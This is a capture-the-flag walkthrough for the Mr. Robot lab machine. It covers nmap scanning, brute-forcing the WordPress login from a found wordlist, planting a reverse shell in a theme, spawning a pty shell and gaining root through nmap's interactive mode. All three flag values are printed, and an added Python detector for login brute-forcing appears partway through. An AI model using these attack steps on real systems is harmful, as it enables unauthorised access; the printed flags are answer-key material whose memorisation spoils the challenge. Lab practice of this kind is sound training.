Introduction

Participants of the Mr. Robot CTF must prove their expertise in penetration testing by successfully infiltrating a virtual machine and attaining root access. Featuring multiple levels of complexity, this challenge is designed to emulate the cyber security aspects depicted in the popular television series, Mr. Robot.

Understanding the Challenge

Mr. Robot CTF is a virtual machine built with deliberate security vulnerabilities. The goal is to find and exploit these weaknesses to gain full root access. The challenge is divided into multiple levels, each requiring different skills and tools.

To start the Mr. Robot CTF, download the virtual machine and import it into your virtualization software, such as VirtualBox or VMware. The virtual machine is available on both TryHackMe and VulnHub.

STEPS >>

We begin the Mr. ROBOT:1 CTF by locating the IP address of the target machine.

sudo nmap -v -sV 192.168.1.*

The scan shows that ports 80/TCP and 443/TCP are open.

Let’s investigate further.

We now run an aggressive scan against the IP address 192.168.1.17.

sudo nmap -A -v 192.168.1.17

Check the robots.txt file.

Now that we are aware of the three keys, let us locate them.

To obtain the first key of three, we need to access the file key-1-of-3.txt.

“073403c8a58a1f80d943455fb30724b9”

Using Dirbuster, it is possible to filter results.

After downloading the txt file found at http://192.168.1.17/fsocity.dic, let us begin by counting the words within.

There is an excessive amount of text that needs to be narrowed down.

cat fsocity.dic | sort | uniq > fs.txt

We are now accessing the wp-admin page via dirb.

Using the brute-force method with Burp Suite, I tested different login and password combinations imported from the fs.txt file.
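The login guessing described above leaves a clear trace in the web server's access log. The following is an added example, not part of the original walkthrough: it flags clients that send many failed POSTs to /wp-login.php inside a short window and notes whether a successful login followed. It assumes the combined log format and default WordPress behaviour (a rejected login returns 200, an accepted one returns 302); the function names, threshold, window and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/Nginx "combined" access-log line: client, timestamp, request, status.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def detect_login_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: {"max_failures": n, "success_after": bool}} for noisy clients."""
    recent = defaultdict(deque)   # ip -> timestamps of failed logins inside the window
    findings = {}
    for raw in lines:
        m = LINE_RE.match(raw)
        if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip, status = m["ip"], m["status"]
        if status == "200":                       # assumption: 200 = rejected login
            q = recent[ip]
            q.append(ts)
            while ts - q[0] > window:             # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                hit = findings.setdefault(ip, {"max_failures": 0, "success_after": False})
                hit["max_failures"] = max(hit["max_failures"], len(q))
        elif status == "302" and ip in findings:  # assumption: 302 = accepted login
            findings[ip]["success_after"] = True  # the guessing run ended in a valid login
    return findings

def constructed_sample():
    """Constructed log lines (not taken from the page): one noisy client, one normal."""
    base = datetime(2024, 3, 10, 10, 0, 0, tzinfo=timezone.utc)
    def line(ip, when, status):
        stamp = when.strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{stamp}] "POST /wp-login.php HTTP/1.1" {status} 3871 "-" "-"'
    lines = [line("203.0.113.50", base + timedelta(seconds=i), 200) for i in range(12)]
    lines.append(line("203.0.113.50", base + timedelta(seconds=12), 302))
    lines += [line("203.0.113.60", base + timedelta(minutes=1 + 5 * i), 200) for i in range(3)]
    lines.append(line("203.0.113.60", base + timedelta(minutes=12), 302))
    return lines

if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(constructed_sample()).items():
        print(ip, info)
```

A finding with success_after set to True is the case to escalate first, because it means the guessing run was followed by an accepted login from the same client.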

Go to the appearance section, add the reverse shell code, then hit update.

Activate the shell immediately.

On the listener, we have now gained access to the system.

python -c "import pty;pty.spawn('/bin/bash')"

With the given commands, you are now able to …

ls

cd home

ls

cd robot

ls

ls -ls

The file is now ready to be read.

Afterward, ensure the hash is verified.

The password belonging to the user “robot” is “abcdefghijklmnopqrstuvwxyz”.

Switch to the user “robot”.

To move forward, use these commands.

ls
cat key-2-of-3.txt

This is the second key: “822c73956184f694993bede3eb39f959”

Now, examine Nmap and use these commands.

cd ../../

which nmap

nmap --help

nmap --interactive

!sh

At this point, we have root access; therefore, let us use these commands.

ls
cd root
ls
cat key-3-of-3.txt

The third key is present here: “04787ddef27c3dee1ee161b21670b4e4”

Congratulations! The machine has been solved.
